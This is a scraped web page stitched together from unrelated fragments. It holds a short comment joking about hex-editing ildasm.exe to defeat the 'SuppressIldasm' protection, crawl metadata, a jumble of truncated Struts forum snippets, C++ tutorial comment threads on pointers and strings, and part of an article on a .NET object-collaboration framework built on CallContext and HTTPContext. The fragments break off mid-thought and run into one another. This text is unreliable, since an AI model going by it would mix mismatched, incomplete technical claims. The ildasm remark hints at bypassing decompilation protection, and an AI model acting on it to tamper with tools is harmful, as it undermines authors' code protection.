Hmm so what if the 'string "SuppressIldasm" in ildasm.exe somehow got slighly damaged by something like a Hexeditor?
I mean things like this happens really quickly on some devel-opers machine.
Compiling, decompiling, hunting & smashing nasty 'bugs' from .NET stuff.
;^) | https://blogs.msdn.microsoft.com/amb/2011/05/27/how-to-prevent-ildasm-from-disassembling-my-net-code/ | CC-MAIN-2019-43 | refinedweb | 463 | 59.4 |
struts - Struts
struts get records in Tabular format How do i get result in tabular format using JSP in struts have already define path in web.xml
i m sending --
ActionServlet...
/WEB-INF/struts-config.xml
for later use in in any other jsp or servlet(action class) until session exist... in struts?
please it,s urgent........... session tracking? you mean session management?
we can maintain using class HttpSession.
the code follows
How do I compile the registration form?
How do I compile the registration form? How do I compile the registration form as stated at the bottom of the following page (URL is below). Do I...://
Struts - JDBC
struts-taglib.jar I am not able to locate the struts-taglib.jar in downloaded struts file. Why? Do i need to download it again
Reg struts - Struts
Reg struts Hi, Iam having Booksearch.jsp, BooksearchForm.java,BooksearchAction.java. I compiled java files successfully. In struts-config.xml Is this correct? I would like to know how do i have to make action 2
Struts 2 we can extend DispatchAction class to implement a common session validation in struts 1.x. how to do the same in the struts2
Struts Project Planning - Struts
Struts Project Planning Hi all,
I am creating a struts application.
Please suggest me following queries i have.
how do i decide how many... should i create those classes which are as table in database??
and how i do... the version of struts is used struts1/struts 2.
Thanks
Hi!
I am using struts 2 for work.
Thanks. Hi friend,
Please visit
java - Struts
java Hai friend,
How to desing Employee form in Struts?
And how the database connections will be do in the struts?
please forward answers as early as possible.
Thank you
File Upload in Struts.
File Upload in Struts. How to do File Upload in Struts
DAO in Struts
DAO in Struts Can Roseindia provide a simple tutorial for implementation of
DAO with struts 1.2?
I a link already exits plz do tell me.
Thank 2
Struts 2 I am just new to struts 2 and need to do the task.
I have a requirement like this :
when i click on link like Customer... will have two buttons like add and edit and a data grid will have the radio
Understanding Struts - Struts
Understanding Struts Hello,
Please I need your help on how I can understand Strut completely. I am working on a complex application which is built with Strut framework and I need to customize this application but I do
multiple configurstion file in struts - Struts
the solution.
I have three configuration file as 'struts-config.xml','struts-module.xml' and 'struts-comp.xml'.I have three jsp pages as 'index1.jsp','index2.jsp...
the the controll will move to three different Action class which are maintained
I wanted do develop mini application With server request and tesponse
I wanted do develop mini application With server request and tesponse I m planning to develop the mini webapplication using struts 1.2.9... to design GUI using struts 1.2.9 and how could be it will take server request
Exception Handling in Struts.
Exception Handling in Struts. How you can do Exception Handling in Struts="
show, hide, disable components on a page with struts - Struts
show, hide, disable components on a page with struts disabling a textbox in struts.. in HTML its like disable="true/false" how can we do it in struts
config
/WEB-INF/struts-config.xml
1
action
*.do
Thanks...!
struts-config.xml... class LoginAction extends Action
{
public ActionForward execute
Using radio button in struts - Struts
, but the radio button has only just one value that i can pass.what can i do to solve... source code to solve the problem :
For more information on radio in Struts
struts validation
struts validation I want to apply validation on my program.But i am failure to do that.I have followed all the rules for validation still I am...;%@ include file="../common/header.jsp"%>
<%@ taglib uri="/WEB-INF/struts
i am Getting Some errors in Struts - Struts
i am Getting Some errors in Struts I am Learning Struts Basics,I am Trying examples do in this Site Examples.i am getting lot of errors.Please Help me
the Struts if being used in commercial purpose.
the Struts if being used in commercial purpose. Do we need to pay the Struts if being used in commercial purpose
you get a password field in struts
you get a password field in struts How do you get a password field in struts
java struts - Java Beginners
java struts i want to do the project in the struts.... how i can configure the project in my eclipse... can u help me in this issues
help - Struts
com.opensymphony.xwork2.ActionSupport;
public class HelloWorld extends...
Hi friend,
Do Some changes in struts.xml
Configuring Struts DataSource Manager on Tomcat 5
directory. Add the servlet API into class path. Then open dos prompt and
navigate...-config.xml
Now add the following action mapping into the struts-config.xml...
Configuring Struts DataSource Manager on Tomcat 5
do the following
do the following write a program to enter the string and do the following
1- count totle number of vowel
2- replace vowel
3- delete the charactor from given value
4- riverce the string
5- convert second word in upercase
6
servlet action not available - Struts
servlet action not available hi
i am new to struts and i am getting the error "servlet action not available".why it is displaying this error...
config
/WEB-INF/struts-config.xml
2
action
*.do
how to do this?
how to do this?
Given any integer 2D array, design then implement a Java program that will add to each element in the array the corresponding column number and the corresponding row number. Then, it prints the array before
STRUTS MAIN DIFFERENCES BETWEEN STRUTS 1 AND STRUTS 2
Struts
Struts How to retrive data from database by using Struts
Struts
Struts how to learn struts
STRUTS
STRUTS Request context in struts?
SendRedirect () and forward how to configure in struts-config.xml
Java Example projects about STRUTS
no job in my hands.
But i do some small projects about STRUTS.
Please send me some example projects about STRUTS.
Please visit the following link:
Struts 2 Interceptors
Struts 2 Interceptors
Struts 2 framework relies upon Interceptors to do most... part of Struts 2
default stack and are executed in a specific order...-action basis and add it to the already
existing Interceptors in the framework
Multiple file upload - Struts
only with servlets and i m using struts.
I have this implemeted in servlets but now i have to do this with struts.
In this "items = upload.parseRequest... using struts and jsp.
I m using enctype="multipart". and the number of files
Struts 2 + Ajax
Struts 2 + Ajax hi ,
i am new in java ,i need a help
I am setting... which contain a path of pdf i.e (c:\demo.pdf) which i want to display in jsp without refreshing.
can anyone tell me the ajax code to
The server encountered internal error() - Struts
file I use the following code.
Do I need to add something about that uri... the problem in struts application.
Here is my web.xml
MYAPP...
org.apache.struts.action.ActionServlet
config
/WEB-INF Tell me good struts manual
plese tell -Struts or Spring - Spring
about spring.
which frameork i should do Struts or Spring and which version.
i also want to do hibernate.
please guide.
thanks. Hi Friend...plese tell -Struts or Spring Hello,
i want to study a framework
struts dropdown list
struts dropdown list In strtus how to set the dropdown list values... page using struts ?
please send me jsp code...
sample code:
**Action Class:-**
ArrayList<DropDownVO> masterList = null;
masterList Training
. The basic platform requirements are Servlet API 2.4, JSP API 2.0 and Java 5...
Struts 2 Training
The Struts 2 Training for developing enterprise applications with Struts 2 framework.
Course
autocall for sturts action class - Struts
a web application with struts frame work. In this project I have to call an action class on startup of the application. i.e. when ever I run my application in the server on action class should run automatically. how can I do this. help me UI - Struts
Struts2 UI Can you please provide me with some examples of how to do a multi-column layout in JSP (using STRUTS2) ? Thanks | http://www.roseindia.net/tutorialhelp/comment/11853 | CC-MAIN-2015-14 | refinedweb | 1,421 | 66.84 |
FormatConversionBean arrives in CPI!
Update 3 Oct 2018: Added Excel converters
Introduction
If you have worked on SAP PI over the past few years, there is a possibility that you may have come across FormatConversionBean – One Bean to rule them all! It is an open source project I developed, providing various format conversion functionalities (complementing SAP’s offering) packaged in a custom PI adapter module.
Although CPI provides similar capabilities, some of its converters lack customising options for more complex scenarios.
The good news is – FormatConversionBean is now available in CPI! Over the past weeks, I’ve began porting over the development to fit into CPI’s Camel-based framework, and the bulk of functionality is now ready to be used.
Converters
The following table lists the converters that are available as part of FormatConversionBean in CPI. The reference link for each converter provides more details on the available configuration options/parameters.
Note: The converter classes are in a different package (com.equalize.converter.core) compared to their PI counterparts.
Usage in Integration Flow
Due to differences between the nature of the design of integration flows in CPI compared to PI, the approach of using it can be summarised in the following steps.
1) Upload JAR file
2) Configure parameters (via Content Modifier or script)
3) Add Groovy script
Below is a sample integration flow utilising FormatConversionBean.
Further details of each step are as follows:-
Step 1 – Upload JAR file
i) Download latest release of converter-core-x.x.x.jar from GitHub repository.
ii) Use Resources view to upload JAR file as an Archive into Integration Flow.
Note: To use the Excel converters, the following Apache POI 3.17 libraries need to be uploaded into the Integration Flow as well.
- poi-3.17.jar
- poi-ooxml-3.17.jar
- poi-ooxml-schemas-3.17.jar
- xmlbeans-2.6.0.jar
- commons-collections4-4.1.jar
Step 2 – Configure parameters
Parameters are passed into FormatConversionBean using Exchange Properties. These can be configured via Content Modifier (sample below) or Script (Groovy or Javascript). Refer to each converter’s blog post for details on available parameters.
Step 3 – Add Groovy script
This is the entry point for the execution of FormatConversionBean. Add a Groovy script step in the Integration Flow with the following code. }
That’s it! It is as simple as that! 🙂
Source Code, Enhancements & Collaboration
The source code for FormatConversionBean is hosted at the following GitHub repository.
It is a Maven-based project with the following attributes:
Anyone and everyone is welcome to fork/clone the repository to further enhance privately or collaborate publicly on this project.
More details utilising Eclipse/Maven to develop and build the project to follow in a future blog post.
Bugs & Feature Requests
If you encounter any bugs or would like to request for a particular feature, the preferred approach is to raise an issue at the following GitHub repository.
This provides a better avenue to track, communicate and collaborate on the issue instead of the comment section of this blog post.
That's a great news and thanks a lot for publishing. Hopefully this makes the developer job easy when it comes to nested/deeper structure conversions.
Hi Naresh
Thanks for your comment. Yes, that is the whole intention - this should hopefully provide an alternative if the standard converters do not meet the integration requirement.
Regards
Eng Swee
Hi Eng Swee,
I have encrypted .XLSX.PGP file in application server, how to decrypt the XLSX file and move to directory using sender SFTP adapter?
Regards,
Nagesh
That's excellent news! I've been using your bean in lots of integration scenario's. I'm really looking forward to use this version in the CPI project I'm currently working on.
Hi Iddo
Thanks for your comment. It's great to hear from someone who has been using the PI version of this in real integration scenarios - I rarely get much feedback on how it is doing out there unless someone hits an issue!
In terms of functionality, not much has changed since the last PI version release, but I do hope to be able to work on enhancing this CPI version further once I complete the whole port (Excel converters coming soon).
Would love to hear from you how this CPI version gets along, so do write back 😉
Regards
Eng Swee
Hi Eng Swee,
I can tell you that I successfully implemented your conversion bean in a CPI scenario where the standard SAP XML-JSON and JSON-XML conversion wasn't capable enough. Something to do with invalid characters in the JSON field names.
Awesome work!
Iddo
Hi Iddo
Thanks for writing back. Real glad to hear that it worked well for your scenario!
Regards
Eng Swee
Wow, that is welcome news indeed, I will almost be sorry to see my somewhat messy workarounds go 🙂
Regards
Tom
Let me know how it goes if you get around to replacing them with this 😉
I just tried out the scenario XML to flatfile with fixed field lengths, it works like a charm!
It must be said that I do not have a deep structure, I have a flat but diverse structure.
The xml structure consists of a root node with 7 different record types below it at the same level. Each record type can occur multiple times, like this:
As the go-live date of the solution is somewhere this week, I guess I won't replace it.
it would have saved me a week of work on the workaround 🙂
Also the excel conversion is interesting, I'm going to test that as well..
Thanks!
Glad to hear it is working 🙂
Yes, it does work with with simple/flat structures as well as deep ones too. Historically, PI already had standard functionality to handle simple/flat structures, so FormatConversionBean was to cater for the deep ones. For CPI, the CSV<>XML converters are still quite basic, so FormatConversionBean can possibly cater for more use cases.
Haven't been able to get the XmltoExcel conversion working.
It produces some sort of an xlsx, there is no error in CPI, but when I look inside the generated file it seems to be empty.
I kept my parameters to a minimum:
Hi Tom
Maybe something to do with the input XML content. Try checking the following blog and see if you can reproduce the XLSX output with the same input XML.
Unlike the Flat file converter, the Excel converter only caters for simple XML structures, i.e. just one type of segment.
If it still doesn't work, please open an issue on the GitHub repository (details in the blog part above), and attach a copy of the input XML file.
Regards
Eng Swee
These features are really developer friendly. Can't wait to try it in my next assignment.
Thanks for summarizing it.
Regards,
Varinder
Hi Engg Swee Yeoh,
I have tried implementing it in CPI but I am getting below error:
java.lang.Exception: java.lang.ClassNotFoundException: com.equalize.converter.core is an invalid converter class@ line 23 in script1.groovy
I have already uploaded the latest JAR converter-core-1.1.0 as Archive in Resource.
I am missing any step?
Regards,
Rutuja Thakre
Hi Rutuja
Thanks for your interest in this.
The error is because the value com.equalize.converter.core in property converterClass is incomplete. You need to refer to each converter's blog post to get the correct value, e.g. com.equalize.converter.core.XML2JSONConverter.
I think the screenshot on step 2 might have been a bit misleading as the value is truncated in the UI - I have modified the screenshot now to show an example of the full value that should be in the property.
Regards
Eng Swee
Hi Eng Swee,
Thanks for your quick reply.
I have made the changes in converterClass and its working fine now.
Great Work.
Regards,
Rutuja Thakre
First of all, thanks for all the work you put in here.
For whatever reasn I seem to be unable to make use of the XLS2XML conversion. I get a java.lang.reflect.MalformedParameterizedTypeException whenver I add the documentNamespace parameter in the "set parameter" step. I tried my own namespace, but also the one mentioned in your post (urn:equalize:com) both in paranthesis as well as without, I also tried simple once like urn:ns0 but I seem to be unable to figure it out.
Could you pls. provide a screenshot how exactly it should be specified?
Thx.
Joern
Hi Joern
Looks like for some reason, the latest 1.3.0 release is having this MalformedParameterizedTypeException issue in other users' tenant despite it working perfectly well on mine.
I will have to release a new version to reverse the changes.
In the meantime, please use version 1.2.0 - it should work fine. Let me know how it goes.
Regards
Eng Swee
Hi Eng
Thanks for the help, acually I tried 1.2.0 but when it errored I saw you published a version 1.3.1, and that works perfectly for me.
I guess I did something wrong with he 1.2.0 install, but as I have to hurry with my prototype, I will need to leave it at 1.3.1 for now. Once I find the time I will come back and analyze the 1.2.0 problem.
Again, thx for all the efoort you put in here.
KR
Jörn
Glad to hear that 1.3.1 worked well for you, Joern.
Do let me know if you fine any other issues with it, and also if you do happen to try 1.2.0 and hit some other issue.
Hope your prototype goes well.
Hi Eng Swee,
Thank you for getting the bean on to CPI.
I have a quick question reg deep flat file to xml. Can we convert a flat idoc to idoc xml using this bean? is it supported?
Thanks,
Vijaya Palla
You can try, but I would imagine it would be quite complex considering how complex an IDoc structure is - be it the flat representation or the XML. No guarantee it will work.
True, but does this actually confused me.
how will my record structure understand that Items1 and Items2 are at the same level, if I specify it as Order,Items1,Items2?
<Order>
<Items1>
</Items1>
<Items2>
</Items2>
</Order>
I would try using the parent parameter. I would keep you posted on how it works.
Thanks,
Vijaya Palla
Hello Eng Swee Yeoh, @engswee.yeoh
This is excellent work! Thank you so much.
I am trying to use the XML2DeepPlainConverter in CPI. I have downloaded converter-core-2.1.0.jar version and uploaded it into CPI. I have even tested my scenario with an the older version 1.2 to see if it made a difference, but there was no difference. I am getting the following error in the groovy script.
java.lang.NullPointerException
My input message is below:
<header1>
<hdrconstant1>header desc 1</hdrconstant1>
<header2>
<hdrconstant2>header desc 2</hdrconstant2>
</header2>
<details>
<num>00000001</num>
<date>20190906</date>
<acctnumber>1234567891</acctnumber>
<code>00</code>
<amount>10.0</amount>
<name>DIESEL</name>
</details>
<details>
<num>00000002</num>
<date>20190906</date>
<acctnumber>1234567892</acctnumber>
<code>00</code>
<amount>20.0</amount>
<name>DIESEL</name>
</details>
<trailer>
<trlconstant1>test</trlconstant1>
<counter>2</counter>
<trlconstant2> </trlconstant2>
<totalamount>30.0</totalamount>
</trailer>
</header1>
Here is my groovy script:
}
I have attached a copy of my content modifer.
Please help me solve this issue!
Thank you,
Rhonda
Hello, I apologize. My issue has been solved. I had named the groovy script with extension ".GROOVY" instead of ".groovy". It must be lowercase.
Thank you again @engswee.yeoh for your great work!!!
Rhonda
Hello @engswee.yeoh
Thanks for such a great explanatory post.
I have tried using the XmltoExcel conversion feature in CPI following both of your blogs.
I have downloaded the required jar files from gitHub and uploaded into the CPI Iflow. I am using the same groovy script as shown here.
It produces some sort of a distorted output although there is no error in CPI.
I have attached the screenshots of my content modifer, resources & output over here.
Can you please help me in understanding the anomaly? Am I missing any step?
The output generated is binary data, so you won't be able to view it in textual format on the browser.
Hello @engswee.yeoh
I am trying to use Excel2XMLConverter in CPI.
But am facing below error: (Please suggest, if there any further configs required)
"org.apache.camel.CamelExecutionException: Exception occurred during execution on the exchange: cause: java.lang.ClassNotFoundException: org.apache.commons.math3.util.ArithmeticUtils"
My configuration As below:
Need few inputs here.
Thank you again @engswee.yeoh
My issue resolved after importing "commons-math3-x.x.x.jar".
Nice blog. Are you aware of any script that can convert and HTML table to XML/CSV/JSON? We are on CPI. The javascripts I found in the web is mainly meant to be run inside a htm page. It is using document.querySelectorAll as the parser which doesn't work in CPI. Is there a way to store the html table we receive in the message body as a real html file somewhere in CPI and thus we can call the document.querySelectorAll?
Thanks Jonathan.
Thanks Eng Swee for this excellent blog.
Cheers Eng Swee,
Took two minutes to setup and easily generate a file for some users to consume due to a multi-ERP environment, which leads to some difficulty for them. As a side note from the last time I commented on a blog of yours... CPI is growing on me and I find the camel model super flexible for object reuse (outside of not allowing cross package references yet). The partner directory API is super handy and despite not using it yet because we just got CPI it's going to help a lot. Taking a little time to internalize some of the notations and things but it's coming along 🙂
Regards,
Ryan Crosby
Hi Ryan, glad to know you got this up and running without much trouble 🙂 And good to know that CPI is growing on you... One day, you may look back and never want to touch PI/PO again 😝
Hi Eng Swee,
Oh I'm already there in regards to skipping out on PI/PO, although, I may still have an inkling for using the graphical mapping based tools for that portion when required. The nice thing is the system is empty from the start, so I'm not carrying forward a ton of legacy content that is crumbling and held together with a combination of duct tape, staples, and bungee cords. Already have two productive scenarios with some object reuse in the first week - I configured the TMS last week after trying to find blog content that explained the process (well enough 😝). That's my one knock, is that like many things in SAP you only get the "Hello World" help documentation, which isn't suitable for real world scenarios.
Regards,
Ryan Crosby | https://blogs.sap.com/2018/09/04/formatconversionbean-arrives-in-cpi/ | CC-MAIN-2021-43 | refinedweb | 2,521 | 65.52 |
There expensive part of whole execution plan.
Rule # 2 : Table scan or clustered index scan needs to be optimized to table seek (if your table is small it does not matter and table scan gives you better result). Table scan happens when index are ignored while retrieving the data or index does not exist at all.
Rule # 3 : Bookmark lookup are not good as it means correct index is not being used or index is not sufficient for all the necessary data to retrieve. The solution of bookmark lookup is to create covering index. Covering index will cover all the necessary columns which needs to improve performance of the query. It may be possible that covering index is slower. Try and Error is good method to find the right match for your need.
Rule # 4 : Experiment with Index hints. In most cases database engines picks up the best index for the query. While determining which index is best for the query, database engine has to make certain assumption for few of the database parameters (like IO cost etc). It may be possible database engine is recommending incorrect index for query to execute. I usually try with few of my own indexes and test if database engine is picking up most efficient index for queries to run. I use Index Hint for this purpose.
Rule # 5 : Avoid functions on columns. If you use any functions on column which is retrieved or used in join or used in where condition, it does not take benefit of index. If I have situation like this, I usually create separate column and populate it ahead of time using simple update query with the value which my function will return. I put index on this new column and this way performance is increased. Creating indexed view is good option too.
Rule # 6 : Do not rely on execution plan only. I understand that this contradicts the Rule # 1, however execution plan is not the only benchmark for indexes. There may be cases that something looks less expensive on execution plan but in real world it takes more time to get data. Test your indexes on different benchmarks.
Rule # 7 : ___________________________________________
Let me know what should be the Rule # 7.
Reference : Pinal Dave ()
#7 — Better to have a THIN Index over FAT Index. If Index is on BIG Varchar column see if those can be substituted to INT column
My Rule # 7 would be: Ensure there aren’t missing or outdated statistics
—
Luciano Evaristo Guerche (Gorše)
Taboão da Serra, SP, Brazil
Rule # 7 : Avoid SP names that begin with sp_
Rule # 8 : Use SET NOCOUNT ON, where ever possible
A lot depends on the usage of the DB – if low data updates and high volume of queries, create a covering index for the most highly used queries since data can be obtainied directly from the index and no lookup to the data table needs to be done.
If possible, store indexes on a separate drive than from the data files.
Well Query Optimizations rules are not limited.
It depends on business needs as well,
For example we always suggest to have a relationship between tables but if they are heavily used for Update insert delete, I personally don’t recommended coz it will effect performance as I mentioned it all depends on Business needs;
Here are few more tips I hope will help you to understand.
One: only “tune” SQL after code is confirmed as working correctly.
(use top (sqlServer) and LIMIT to limit the number of results where appropriate,
SELECT top 10 jim,sue,avril FROM dbo.names )
Two: ensure repeated SQL statements are written absolutely identically to facilate efficient reuse: re-parsing can often be avoided for each subsequent use.
Three: code the query as simply as possible i.e. no unnecessary columns are selected, no unnecessary GROUP BY or ORDER BY.
Four: it is the same or faster to SELECT by actual column name(s). The larger the table the more likely the savings.
Five: do not perform operations on DB objects referenced in the WHERE clause:
Six: avoid a HAVING clause in SELECT statements – it only filters selected rows after all the rows have been returned. Use HAVING only when summary operations applied to columns will be restricted by the clause. A WHERE clause may be more efficient.
Seven: when writing a sub-query (a SELECT statement within the WHERE or HAVING clause of another SQL statement):
— use a correlated (refers to at least one value from the outer query) sub-query when the return is relatively small and/or other criteria are efficient i.e. if the tables within the sub-query have efficient indexes.
— use a noncorrelated (does not refer to the outer query) sub-query when dealing with large tables from which you expect a large return (many rows) and/or if the tables within the sub-query do not have efficient indexes.
— ensure that multiple sub-queries are in the most efficient order.
— remember that rewriting a sub-query as a join can sometimes increase efficiency.
Eight: minimize the number of table lookups especially if there are sub-query SELECTs or multicolumn UPDATEs.
Nine: when doing multiple table joins consider the benefits/costs for each of EXISTS, IN, and table joins. Depending on your data one or another may be faster.
‘IN is usually the slowest’.
Note: when most of the filter criteria are in the sub-query IN may be more efficient; when most of the filter criteria are in the parent-query EXISTS may be more efficient.
Ten: where possible use EXISTS rather than DISTINCT.
Praveen Barath
Pingback: SQL SERVER - Optimization Rules of Thumb - Best Practices - Reader’s Article Journey to SQL Authority with Pinal Dave
Remember that many performance problems cannot be reproduced in your development environment, and examining the issue in the production environment is essential. When users report a performance problem, use SQL Server Profiler to insure you are attempting to optimize the correct procedure, and determne exactly how much time and resources it is comsuming. This can later be used a benchmark to measure how much improvement (if any) your attempts at performance optimization have made.
Also, if users report that a database operation, which normally runs within an acceptable amount of time, will sporatically run for significantly longer, use sp_who2 or server traces to determine if process blocking is at the root of the problem and then what conditions (available memory, another process that competes for the same resources, etc.) contribute to the blocking.
Rule #7 use set statistics io,time on in order to get scan count, logical reads etc
Pingback: SQL SERVER – Weekly Series – Memory Lane – #026 | SQL Server Journey with SQL Authority | http://blog.sqlauthority.com/2008/04/25/sql-server-optimization-rules-of-thumb-best-practices/ | CC-MAIN-2014-35 | refinedweb | 1,122 | 60.04 |
Results 1 to 1 of 1
Thread: HELP! If else statement
- Join Date
- Jul 2011
- 9
- Thanks
- 1
- Thanked 0 Times in 0 Posts
HELP! If else statement
I need to create a if else statement to check multiple model numbers (200+)... How can i build this? I basically want the user to enter their model number and if its on the list they get a approved or denied message.
So far I have this, the "if(model == 9002||1002)" doesnt seem right, it needs to basically check 200+ model numbers... am I even on the right track?
Code:
#include <iostream> using namespace std; int main(){ int model; cout << "Enter model" << endl; cin >> model; if(model == 9002||1002) { cout << "Model Approved" << endl; } else { cout << "Model Denied" << endl; } return 0; } | http://www.codingforums.com/computer-programming/294585-help-if-else-statement.html | CC-MAIN-2015-48 | refinedweb | 129 | 81.02 |
const int arrayLength = 7;
char name[arrayLength] = "Mollie";
int numVowels(0);
for (char *ptr = name; ptr < name + arrayLength; ++ptr)
{
switch (*ptr)
{
case 'A':
case 'a':
case 'E':
case 'e':
case 'I':
case 'i':
case 'O':
case 'o':
case 'U':
case 'u':
++numVowels;
}
}
cout << name << " has " << numVowels << " vowels.\n";
for this example shouldn't the for loop termination condition be ptr < name + (arrayLength-1); ? Since the loop also checks the null terminator of the char array ? is that necessary
Yes, we could optimize this by adding a -1, so it doesn't check the null terminator.
Hi Alex,
Which is the diference between std::endl and "\n"?
I read it before in other chapter, but I can't find it.
Thank you for the tutorial and the support that you provide! 🙂
Hi Santi!
When you use std::cout the input you give it is stored in a buffer. That buffer is regularly cleared and it's contents are displayed in the console. When you use '\n' the newline character will be inserted in the buffer and remain there until the next update occurs. When using std::endl the buffer is flushed immediately and your text is displayed.
'\n' is faster than std::endl but you might not see your text right away.
If you want to print multiple lines, you can use '\n' for every but the last line and use std::endl for the last line.
#include <iostream>
int main()
{
const char *myName = "Alex";
std::cout << myName;
return 0;
}
in this, how can you initialize a pointer with a string? pointer should be initialized with address. make me clear about this.
And why do you use const here?
what would be the result without const?
"Alex" is a string literal. If myName was non-const, then you could try to modify "Alex", which will lead to undefined results. Making it const enlists the compiler's help in ensuring we don't try to modify the literal.
"Alex" is a string literal. String literals have special handling. They are stored in a special part of memory, and are given a memory address. So you can initialize a char pointer with the address of a string literal.
in this , name is an array then why don't it outputs the address of its first element?
Because std::cout has special handling for arrays of type char* or const char* that causes them to print as C-style strings instead.
hi alex, when i declare a pointer such as
can i say that ptr is the pointer pointing to a pointer? thanks
Also, one more question for the
you put arrayLength = 7 is that because of we need one more index for ''? Thanks so much !
1) No. ptr is a pointer pointing to an array of 3 integers.
2) Yes, the array length needs to be large enough to hold the null terminator, otherwise crazy things will happen when we try to print the name or do anything else that is expecting the null terminator to be there.
thanks for the answer
ptr < name + arrayLength;
can you please explain me this line.
Hi, I think that means
the same thing. which is the array[0] + arrayLength so totally 7 indexes there. I am not sure if I am right.
name is the address of the start of the array. arrayLength is the number of elements in the array. so name + arrayLength uses pointer arithmetic to find the address of the element that is just beyond the end of the array.
If ptr is initially set to name, then we can increment ptr to step through the array, and continue doing so as long as ptr < name + arrayLength. As soon as ptr == name + arrayLength, we know we've gone off the end of the array and should stop iterating.
thankyou for the reply....now i get it 🙂
alex can you please advice me some online websites or books which can help me in developing logical skills for programming
correct me if i m wrong
as name is char ,when we increase the index by 1, we increase the adress by 1
if it was integer we would use
ptr < name + (arrayLength*4);
You are incorrect. When you increment a pointer, it automatically scales based on the type. So incrementing an integer pointer by 1 will increase the address by 4 (assuming 32-bit integers).
Hello,
Why doesn't this work?
"No operator ">>" matches this operand:
operand types are: std::istream >> std::string"
Works fine for me on Visual Studio 2017 and on the cpp.sh online compiler. Are you including the string header?
So I was a bit confused with the switch loop, so I *think* I made it a bit more readable for some folks. Instead of declaring and initializing the ptr and declaring it inside the loop, it is outside now and just uses int i = 0 and i < arraylength (which equals 7). Hope this helps someone!
int main()
{
const int arrayLength = 7;
char name[arrayLength] = "Mollie";
int numVowels(0);
char *ptr = name;
for (int i = 0; i < arrayLength; ++i, ++ptr)
{
switch (*ptr)
{
case 'A':
case 'a':
case 'E':
case 'e':
case 'I':
case 'i':
case 'O':
case 'o':
case 'U':
case 'u':
++numVowels;
}
}
cout << name << " has " << numVowels << " vowels.\n";
return 0;
}
Name (required)
Website | http://www.learncpp.com/cpp-tutorial/6-8a-pointer-arithmetic-and-array-indexing/ | CC-MAIN-2018-13 | refinedweb | 883 | 72.36 |
The Simple Object Collaboration Framework is a simple library that enables complex interactions between objects, possible by providing a new mechanism of instance discovery and lifetime management. It is an extension of the .NET CallContext or HTTPContext mechanism that provides a way of sharing objects within an execution code path.
The OMG UML Specification defines a ‘Collaboration’ as follows:
The specification of how an operation or classifier, such as a Use Case, is realized by a set of classifiers and associations playing specific roles used in a specific way. The collaboration defines an interaction.
A diagram that shows interactions organized around the structure of a model, using either classifiers and associations or instances and links. Unlike a sequence diagram, a collaboration diagram shows the relationships among the instances. Sequence diagrams and collaboration diagrams express similar information, but show it in different ways.
UML treats collaborations as separate entities that are designed to perform a specific task, and groups them into two levels; Specification Level and Instance Level. Specification level collaboration defines a more general perspective of a repeating 'pattern' in a system. Design Patterns usually use collaboration diagrams to demonstrate the interaction between classifier roles instead of object instances. So you can just plug in the actual object instances at runtime.
Although UML collaboration diagrams are very useful, there is an important missing information that they don't carry. First, they don't mention how objects discover each other in order to interact, and second, they don't mention how their lifetimes are managed. A sequence diagram, on the other hand, can illustrate the flow of events along a time axis, so it shows object lifetime as well, at least for a particular operation. However, a sequence diagram still doesn’t mention how the life time management is actually achieved. With .NET garbage collection and reference tracking, it seems lifetime management is just the responsibility of the runtime. But, the runtime can do it based on how you decide to reference your objects, or release them. So the life time management that is mentioned in this article specifically emphasizes the necessary responsibility assignment for objects to control the lifetime of other objects.
Following is a list of instance discovery mechanisms that are currently available in .NET:
CallContext
HTTPContext.Current
There are also some derivative mechanisms like Singletons, Dependency Injection Containers, and Identity Maps. But these aren't part of the .NET framework. You can find tons of code samples around these concepts.
Each of these mechanisms of discovering object instances also has object lifetime management implications. For instance, when you use local variables, you imply that the object lifetime should be limited to the current method scope. If you use some sort of compositional model, then the assumption is that the parent (or container) is responsible for controlling the lifetimes of its children. Caching mechanisms like Session and Application cache, or static variables, imply that the object’s lifetime is controlled by the cache. Session makes sure objects live at least as long as the user is active, and the Application cache or a static variable makes sure the object lives as long as the process lives.
The following diagram shows the caching scopes provided by ASP.NET:
If you are developing complex line-of-business applications, chances are you've already used all or most of the above methods. Probably, the least known of them all are the CallContext and HTTPContext. These two provide a mechanism for creating a shared context that all objects can share during a method call (CallContext) or a single request (HTTPContext). Whatever you put into context has lifetime and instance sharing implications. Any object that you put into the HTTPContext will live at least until the current request completes, and will be accessible by any method call that is made within the current request and the current thread. CallContext is pretty much similar to HTTPContext. The main difference is that the CallContext is tied to the current thread while the HTTPContext is tied to the current HTTP request. Although ASP.NET can run one part of the code in one thread (like page init) and part of it in another (like page render), it makes sure that the HTTPContext is always properly migrated to the current thread. So, HTTPContext is much more reliable within ASP.NET than CallContext.
HTTPContext
When objects are instantiated and put to those call contexts, their lifetimes are limited by the call. Of course, if you have other references to an object in the context, it will outlive the context. But the point is, the lifetimes are really controllable by this mechanism without having to explicitly write code for it. Just think about what you would have to do if you were to use Session instead of HTTPContext. You would either prefer not managing the lifetime at all and keep all the objects around until the session ends, or you would have to add when you need them and remove when you want to get rid of them. This would be a manual lifetime management task, which would probably be misused or forgotten in most cases. On the other hand, HTTPContext just makes sure that you don’t even need to think about neither the lifetime nor the sharing. It magically handles it all for you.
Session
If you aren’t still convinced that such shared and lifetime managed context mechanisms are really useful, here are some examples that you are probably using already with or without noticing that they are there:
If such contextual sharing mechanisms weren't available, what would you do? Probably, you could use method parameters, or just set properties of your objects to let them know about such information. This means, you would have to write a lot of data transfer code, only taking parameters from one method and passing them to another. Either the class contract or the method contract would have to change as the system evolves, by adding more contextual information. But, imagine a system with many layers and a large object model. With the availability of call context, it is now possible to change such a system by just adding more information into the context and the consumer code that uses it at any method/layer. In an ASP.NET application, you could be calling a method that does 10 other nested calls, and you are still able to access the current transaction or the security context without having to pass those from one method to another. Isn’t that nice?
We can think of many other cases where we could use such contextual sharing of objects. Here are some examples:
UserLanguage.Translate(…)
The list can go on and on. But, notice most of what we tend to think of are all operations that are orthogonal to the application’s main functionality. Indeed, this is a very good reason why we should prefer context objects rather than mess up with the application specific contracts. Thus, we can always keep the domain object model and all contracts clean and undisturbed by these orthogonal functions. The system could evolve vertically and horizontally with the minimal possible entanglement.
Although the CallContext and HTTPContext provide a pretty good way of handling context sharing, they give us a single shared context and single scope for managing object lifetime for the whole request. In other words, once you put something into CallContext, it'll be there until the request ends. Here's a nice article if you want to learn more about CallContext and HTTPContext. If only there was a way to generalize this same idea and make it more granular, and give the programmer the ability to just start a new context and control the sharing and lifetime of such contextual information. Well, now there is such a library: SOCF.
